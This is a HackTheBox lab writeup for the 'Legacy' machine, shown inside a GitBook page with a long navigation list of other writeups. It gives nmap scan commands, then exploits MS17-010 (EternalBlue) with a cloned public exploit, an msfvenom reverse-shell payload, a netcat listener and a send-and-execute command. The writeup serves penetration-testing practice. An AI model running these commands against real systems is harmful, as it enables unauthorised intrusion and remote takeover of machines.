📓
Pentesting
  • Writeups
  • HackTheBox
    • Easy Machines
      • Beep Writeup
      • Shocker Writeup
      • Lame Writeup
      • Jerry Writeup
      • Legacy Writeup
      • Blue Writeup
  • TryHackMe
    • Walkthroughs: Easy
      • CC: Steganography
      • Cryptography for Dummies
      • Cross-site Scripting
      • SQL Injection Lab
      • SQL Injection
      • ZTH: Web 2
      • SSRF
      • XXE
      • Authenticate
      • Injection
      • Blaster
      • The Cod Caper
      • Hardening Basics Part 1
      • What the Shell?
      • Game Zone
      • Upload Vulnerabilities
      • Bolt
      • Erit Securus 1
      • CC: Pentesting
      • JavaScript Basics
      • OverPass 2 - Hacked
      • Linux: Local Enumeration
      • Ice
      • Linux Backdoors
      • Avengers Blog
      • DNS in Detail
      • Putting it all together
      • Kenobi
      • Common Linux Privesc
      • Network Services 2
      • Network Services
      • The Hacker Methodology
      • The Find command
      • HTTP in Detail
      • Web Fundamentals
      • How Websites Work
      • Introductory Networking
    • Challenges (CTF): Easy
      • VulNet: Roasted
      • VulNet: Internal
      • Git Happens
      • Kiba
      • VulNet: Node
      • Memory Forensics
      • Smag Grotto
      • Investigating Windows
      • Cat Pictures
      • Juicy Details
      • Anthem
      • Tony The Tiger
      • Jack-of-All-Trades
      • JPGChat
      • Blueprint
      • All in One
      • Gotta Catch'em All
      • Mustacchio
      • Break Out The Cage
      • HeartBleed
      • Poster
      • Madness
      • Source
      • Thompson
      • Library
      • Magician
      • Anonforce
      • Dav
      • GLITCH
      • Fowsniff CTF
      • Team
      • H4cked
      • Easy Peasy
      • ColddBox: Easy
      • Archangel
      • Cyborg
      • Chocolate Factory
      • Brute It
      • Year of the Rabbit
      • ChillHack
      • Gaming Server
      • Brooklyn Nine Nine
      • Wgel CTF
      • Tomghost
      • ToolsRus
      • Skynet
      • Startup
      • Agent Sudo
      • Lian-Yu
      • OhSINT
      • Overpass
      • Crack The Hash
      • Ignite
      • Inclusion
      • Bounty Hunter
      • LazyAdmin
      • RootMe
      • Pickle Rick
      • Basic Pentesting
      • Simple CTF
  • Crackmes.one
    • 1 Difficulty Rating
      • easyAF
      • Easy Keyg3nme
Powered by GitBook
On this page
  • Reconnaissance
  • Enumeration
  • Exploitation

Was this helpful?

  1. HackTheBox
  2. Easy Machines

Legacy Writeup

Without Metasploit

PreviousJerry WriteupNextBlue Writeup

Last updated 3 years ago

Was this helpful?

Reconnaissance

Initial Nmap Scan to find open ports, using treat all hosts as online (-Pn) 

nmap -Pn 10.10.10.4

Detailed Nmap Scan :‌

Command Breakdown:‌

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 139,445,3389

  • (-oN nmap): Saving it into a files called nmap

nmap -sC -sV -p 139,445,3389 -oN nmap 10.10.10.4

Enumeration

SMB is a command service with vulnerabilities, lets use a nmap script specific to smb to find vulnerabilities.

nmap --script smb-vuln* -p 139,445 10.10.10.4

Exploitation

The vulnerability that we will be exploiting is called Eternal Blue, a vulnerability that exploits Microsoft's implementation of Server Message Block (SMB) protocol. If an attacker sends a payload, the attacker would be allowed to execute arbitrary code on the target machine.

First let us download the exploit from GitHub

git clone https://github.com/helviojunior/MS17-010.git

Now we have to use MSF Venom to create a reverse shell payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=1234 -f exe > exploit.exe

Now lets start a listener on our machine 

nc -lvnp 1234

Lets run the exploit 

python send_and_execute.py 10.10.10.4 exploit.exe

And we have a reverse shell

Now if we try using the whoami command to find what privileges we have on the system, it does not work, so I just went looking for both the flags, and found out that I can read both of them which means we are NT AUTHORITY\SYSTEM.

We can see that it is vulnerable to (MS08-067) and (ms17-010) , two commonly known vulnerabilities

There is a great explaining this vulnerability and how to exploit it.

CVE-2008-4250
CVE-2017-0143
article